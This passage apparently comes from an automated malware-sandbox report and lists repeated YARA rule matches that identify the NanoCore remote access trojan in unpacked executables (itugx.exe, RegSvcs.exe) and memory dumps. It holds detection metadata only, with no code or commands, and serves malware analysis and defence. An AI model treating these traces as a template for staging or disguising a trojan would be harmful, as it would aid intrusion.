      Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPE, Matched rule: Detects NanoCore, Author: ditekSHen
      Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects NanoCore, Author: ditekSHen
      Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects NanoCore, Author: ditekSHen
      Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPE, Matched rule: Detects NanoCore, Author: ditekSHen
      Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects NanoCore, Author: ditekSHen
      Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects NanoCore, Author: ditekSHen
      Source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPE, Matched rule: Detects NanoCore, Author: ditekSHen
      Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPE, Matched rule: Detects NanoCore, Author: ditekSHen
      Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPE, Matched rule: Detects NanoCore, Author: ditekSHen
      Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPE, Matched rule: Detects NanoCore, Author: ditekSHen
      Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 3.2.RegSvcs.exe.5e30000.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 3.2.RegSvcs.exe.5e30000.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects NanoCore, Author: ditekSHen
      Source: 3.2.RegSvcs.exe.5e30000.3.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects NanoCore, Author: ditekSHen
      Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects NanoCore, Author: ditekSHen
      Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPE, Matched rule: Detects NanoCore, Author: ditekSHen
      Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPE, Matched rule: Detects NanoCore, Author: ditekSHen
      Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 3.2.RegSvcs.exe.6040000.5.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPE, Matched rule: Detects NanoCore, Author: ditekSHen
      Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 3.2.RegSvcs.exe.6040000.5.raw.unpack, type: UNPACKEDPE, Matched rule: Detects NanoCore, Author: ditekSHen
      Source: 3.2.RegSvcs.exe.6040000.5.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPE, Matched rule: Detects NanoCore, Author: ditekSHen
      Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Detects NanoCore, Author: ditekSHen
      Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Detects NanoCore, Author: ditekSHen
      Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, Author: unknown
      Source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth (Nextron Systems)
      Source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
